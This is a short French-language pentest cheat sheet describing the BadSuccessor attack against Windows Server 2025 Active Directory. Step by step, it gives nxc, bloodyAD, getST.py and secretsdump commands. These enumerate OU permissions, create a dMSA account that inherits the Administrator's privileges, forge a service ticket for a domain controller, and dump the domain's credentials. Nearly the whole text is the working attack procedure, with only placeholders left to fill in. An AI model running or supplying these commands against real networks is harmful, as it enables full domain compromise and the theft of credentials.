BadSuccessor (Windows Server 2025)

Récupération des comptes ayant les droits nécessaires sur une OU

nxc ldap <dc_ip> -u <username> -p <password> -M badsuccessor

Création d’un compte dMSA

Une fois les comptes et les OUs associées connus, il est posible de créer le compte dMSA de la façon suivante :

bloodyAD --host <dc_ip> -d <domain> -u <username> -p <password> add badSuccessor <dMSA_account_name> -t <target_account> -ou <target_OU>

Le compte ciblé devra être de la forme CN=,CN=Users,DC=,DC= ; L’OU ciblée devra être de la forme OU=<OU_name>,DC=,DC=local ; Si ces paramètre sont omis, c’est le compte Administrator qui sera ciblé et le compte dMSA sera créé dans la première OU où le compte utilisé possède le droit “Create child”.

Un TGT associé au compte dMSA sera alors généré.

Obtention d’un ST

En utilisant le TGT précédemment obtenu, on génère un Silver Ticket pour un DC :

export KRB5CCNAME=<TGT_ccache_file>
getST.py -spn cifs/<dc_hostname> -dc-ip <dc_ip> <domain>/<dMSA_account_name> -k -no-pass

Compromission du domaine

Grâce au ST obtenu pour un DC, il ne reste plus qu’à exécuter secretsdump sur celui-ci :

export KRB5CCNAME=<ST_ccache_file>
secretsdump -k -no-pass <dMSA_account_name>@<dc_hostname>